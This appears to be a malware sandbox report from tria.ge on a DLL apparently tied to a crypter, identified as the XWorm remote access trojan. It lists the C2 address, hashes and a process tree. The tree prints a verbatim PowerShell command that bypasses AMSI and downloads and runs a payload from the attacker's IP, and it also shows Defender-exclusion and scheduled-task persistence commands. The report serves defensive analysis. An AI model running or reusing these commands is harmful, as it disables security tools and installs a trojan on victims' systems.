Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    126s
  • max time network
    145s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250217-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    08/03/2025, 19:10

General

  • Target

    NukeCrypter/SspiCli.dll

  • Size

    14.0MB

  • MD5

    7697bb66b64ca30f53344f8b2a4dbd2a

  • SHA1

    9fb9053ec18db85b9a55439b048fbbc694a1f9bb

  • SHA256

    49861d9f7c2743bd8e7895ce173356f11474b393d9d8ecabb79b0fecc625e790

  • SHA512

    7785d935729f342304ab87b4ea7d6050dfc76ff5e7a04123273769448a0de2e3d4c5df006136d47d6d3e476e8d23fdbb875484cd81ad29315faabe9ddea4fe79

  • SSDEEP

    196608:y8qw4TxltmlBWDolz/tGTeyMdfkjIxj4/zHd1vqGyvnkYIiHuqZf:WxDolz/tGTeyMMIwHLiGyvnkC

Malware Config

Extracted

Family

xworm

Version

5.0

C2

45.137.201.27:2010

Mutex

NJSnJLx9hqfSdYjB

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    msedge.exe

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 2 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\NukeCrypter\SspiCli.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3908
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\my_script.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2172
      • C:\ProgramData\Powermode.exe
        Powermode.exe -w hidden -ComMand $m1='A';$m3='i';$m2='ms';$m=$m1+$m2+$m3;$a1='am';$a2='si';$a=$a1+$a2+'InitFailed';$b1='No';$b2='nPu';$b3='bli';$b4='c,St';$b5='at';$b6='ic';$b=$b1+$b2+$b3+$b4+$b5+$b6;$ex=$null;$aaa1=[Ref].Assembly.GetType('System.Management.Automation.'+$m+'Utils').GetField($a,$b);$aaa1.SetValue($ex,$true);$XZLqW6au='http://45.137.201.27:30054/msedge.exe';$output=[System.IO.Path]::Combine($env:APPDATA,'msedge.exe');[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri $XZLqW6au -OutFile $output;Start-Process -FilePath $output;exit
        3⤵
        • Downloads MZ/PE file
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4048
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\my_script.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4564
      • C:\ProgramData\Powermode.exe
        Powermode.exe -w hidden -ComMand $m1='A';$m3='i';$m2='ms';$m=$m1+$m2+$m3;$a1='am';$a2='si';$a=$a1+$a2+'InitFailed';$b1='No';$b2='nPu';$b3='bli';$b4='c,St';$b5='at';$b6='ic';$b=$b1+$b2+$b3+$b4+$b5+$b6;$ex=$null;$aaa1=[Ref].Assembly.GetType('System.Management.Automation.'+$m+'Utils').GetField($a,$b);$aaa1.SetValue($ex,$true);$XZLqW6au='http://45.137.201.27:30054/msedge.exe';$output=[System.IO.Path]::Combine($env:APPDATA,'msedge.exe');[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri $XZLqW6au -OutFile $output;Start-Process -FilePath $output;exit
        3⤵
        • Downloads MZ/PE file
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4088
        • C:\Users\Admin\AppData\Roaming\msedge.exe
          "C:\Users\Admin\AppData\Roaming\msedge.exe"
          4⤵
          • Checks computer location settings
          • Drops startup file
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3656
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1864
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:968
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4388
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:756
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4612
  • C:\Users\Admin\AppData\Local\msedge.exe
    "C:\Users\Admin\AppData\Local\msedge.exe"
    1⤵
    • Executes dropped EXE
    PID:2244
  • C:\Users\Admin\AppData\Local\msedge.exe
    "C:\Users\Admin\AppData\Local\msedge.exe"
    1⤵
    • Executes dropped EXE
    PID:3176

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\Powermode.exe

    Filesize

    445KB

    MD5

    2e5a8590cf6848968fc23de3fa1e25f1

    SHA1

    801262e122db6a2e758962896f260b55bbd0136a

    SHA256

    9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3

    SHA512

    5c5ca5a497f39b07c7599194512a112b05bba8d9777bee1cb45bf610483edbffff5f9132fee3673e46cf58f2c3ba21af7df13c273a837a565323b82a7b50a4d8

  • C:\ProgramData\my_script.bat

    Filesize

    729B

    MD5

    092cabe7fe4773b78ff62f414633572f

    SHA1

    c9f77f261d45e394086f7bb23eb91b80b8d0b318

    SHA256

    85d5ee43057001a08fa00e02a4aaf7d84a2d4407f662fa9c22b16b22a9d0738b

    SHA512

    e5d1b866e5a50243f953b67f191c4185aecdc828e5641cae6f78486f71f337f3efedbcb6051586b886a3c321db6fb17f9fe276cbc9954e0abb41e0813589a022

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Powermode.exe.log

    Filesize

    3KB

    MD5

    4521e67a3b03b060fde700c36d3b9297

    SHA1

    4a730cd86dc7a57ac001d59853dd500c1b83b4ab

    SHA256

    a72aa223a84c4fa011c8a2b0ef2475a83d5123de2cdfa6a7160231729e68383d

    SHA512

    90235850eef71c2f0921d04e6990147af9e76fec8ee49e12e6a5bab065ff0e63331a54be845026f17a7b1dd230ee94843099db4813c127c6bafb8cbaf59b753f

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

    Filesize

    654B

    MD5

    11c6e74f0561678d2cf7fc075a6cc00c

    SHA1

    535ee79ba978554abcb98c566235805e7ea18490

    SHA256

    d39a78fabca39532fcb85ce908781a75132e1bd01cc50a3b290dd87127837d63

    SHA512

    32c63d67bf512b42e7f57f71287b354200126cb417ef9d869c72e0b9388a7c2f5e3b61f303f1353baa1bf482d0f17e06e23c9f50b2f1babd4d958b6da19c40b0

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    3eb3833f769dd890afc295b977eab4b4

    SHA1

    e857649b037939602c72ad003e5d3698695f436f

    SHA256

    c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

    SHA512

    c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    5f0daed2486130991fb6f2f0109ff72a

    SHA1

    1a62c810a1313b2529c0e5be0b529b50d792c9c0

    SHA256

    311bf57987226fee29c19474b63f7755f42f1bf9d75a59d3646fead22160a6e2

    SHA512

    1d5f32686a5ed7663b706e03e2a19cec6f1a80183ae22e3d2d7242f727a2605db857076e62ad261aec645d79546d473f780609785c9e9b45262e50c66f7b5842

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    bee417d07ed43d1036fd63bbf6f1f0fb

    SHA1

    f89e22e8f53d48448b5e1c6ab2d0eae0594356d4

    SHA256

    14cd035e71e9de89416f0ebbc6e43084c16f212d10ae84774508e7a25c84dc30

    SHA512

    11abcbe8e0d8515da5b56e1a752d6c70e4b78a7d8379feae2bdbfe885434f18eb09b6d283341b46a7ebc5f356da3aefa445ff83c74045fc3ce641cffb0ba120d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    a1bafdfa6ee8d81727db67fc12d9e3f2

    SHA1

    c22129ce21faba480196334c9a7d7b2c967b0729

    SHA256

    aeadfd69f302dac8ff81f9d4ea10499d7a80c72cc3cfab04624d612e0c75aacb

    SHA512

    b7bd1203032ccab2cee0296fe17e15517bbd2e09ec7fb3c357fe46e370f6fd20b7028cf2154fd08358ab15fff0120b7d7f7149c6ada312f0d65d2ea23405487b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    fd1affecdeec722b8af1e33e3ebd9adf

    SHA1

    086dd9286c59cd136edd77b9967fa475e152f244

    SHA256

    1f438eccd739ecf991be73aafe9539dd1a4eeb0630d028ceadf044db9cc60305

    SHA512

    d93fa5e589f74be36358fb4a3e9acf849686dfd519921f66710a301657328dfab150654397ed0a9d6765888405e95e5e6c256bf6cde8ce29193b504cc605a33b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fz0ayh2z.2b5.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\msedge.exe

    Filesize

    165KB

    MD5

    22a01fdc6d06f445af5de9759799225f

    SHA1

    1dde5be9d7c8a7ae68332c92a6e1263f24705f7c

    SHA256

    682acd04365f06fd83daa81b7bbd71665a60e729d6d4ecc3693eb486b8d4a13f

    SHA512

    e602f9d32b78c8d317698337ea2eb02b6bbf72cae13d3a5c3e3cee39c2445a8c2d85514eb7c741125364fee2f83582ce6a41154128a6c88c257cb5e41eb8f2d6

  • memory/3656-54-0x0000000000F10000-0x0000000000F3E000-memory.dmp

    Filesize

    184KB

  • memory/4048-18-0x00007FFC1ABC0000-0x00007FFC1B682000-memory.dmp

    Filesize

    10.8MB

  • memory/4048-36-0x00007FFC1ABC0000-0x00007FFC1B682000-memory.dmp

    Filesize

    10.8MB

  • memory/4048-28-0x00007FFC1ABC0000-0x00007FFC1B682000-memory.dmp

    Filesize

    10.8MB

  • memory/4048-8-0x000001772FC90000-0x000001772FCB2000-memory.dmp

    Filesize

    136KB

  • memory/4048-7-0x00007FFC1ABC3000-0x00007FFC1ABC5000-memory.dmp

    Filesize

    8KB

  • memory/4088-31-0x00007FFC1ABC0000-0x00007FFC1B682000-memory.dmp

    Filesize

    10.8MB

  • memory/4088-53-0x00007FFC1ABC0000-0x00007FFC1B682000-memory.dmp

    Filesize

    10.8MB

  • memory/4088-30-0x00007FFC1ABC0000-0x00007FFC1B682000-memory.dmp

    Filesize

    10.8MB

  • memory/4088-29-0x00007FFC1ABC0000-0x00007FFC1B682000-memory.dmp

    Filesize

    10.8MB